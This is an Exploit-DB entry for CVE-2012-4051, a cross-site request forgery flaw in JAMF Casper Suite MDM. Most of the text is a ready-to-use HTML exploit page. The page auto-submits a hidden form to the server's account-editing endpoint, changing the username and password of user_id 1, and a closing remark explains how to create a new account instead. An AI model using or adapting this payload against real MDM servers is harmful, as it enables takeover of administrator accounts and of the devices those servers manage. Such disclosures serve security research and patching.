JAMF Casper Suite MDM - Cross-Site Request Forgery

EDB-ID:

21545




Platform:

JSP

Date:

2012-09-27


CVE-2012-4051 - JAMF Casper Suite MDM CSRF Vulnerability

# Exploit Title: JAMF Software's Casper Suite MDM Solution CSRF
# Date: Discovered and reported July 2012
# Author: Jacob Holcomb/Gimppy042
# Software JAMF Software Casper Suite (http://jamfsoftware.com/products/casper-suite)
# CVE : CVE-2012-4051 for the CSRF 


<head>
<title>PwNd JAMF Casper Admin CSRF BY:Jacob Holcomb</title>
</head>

<body>

<form name="csrf" 
action="https://CASPERSUITE_SERVER:8443/editAccount.html" method="post">
<input type="hidden" name="view" value="Save"/>
<input type="hidden" name="source" value="jss"/>
<input type="hidden" name="lastPage" value="editAccountGeneral.jsp"/>
<input type="hidden" name="lastTab" value="Account"/>
<input type="hidden" name="username" value="Gimppy"/>
<input type="hidden" name="realname" value="Pwnd"/>
<input type="hidden" name="email" value="Admin"/>
<input type="hidden" name="phone" value="Password"/>
<input type="hidden" name="password" value="pwnd1"/>
<input type="hidden" name="vpassword" value="pwnd1"/>
<input type="hidden" name="user_id" value="1"/>
</form>

<script>
document.csrf.submit();
</script>

</body>
</html>


If the HTML parameter/variable "user_id" is changed to a value of negative
one (-1) this request to the web server will create a new user.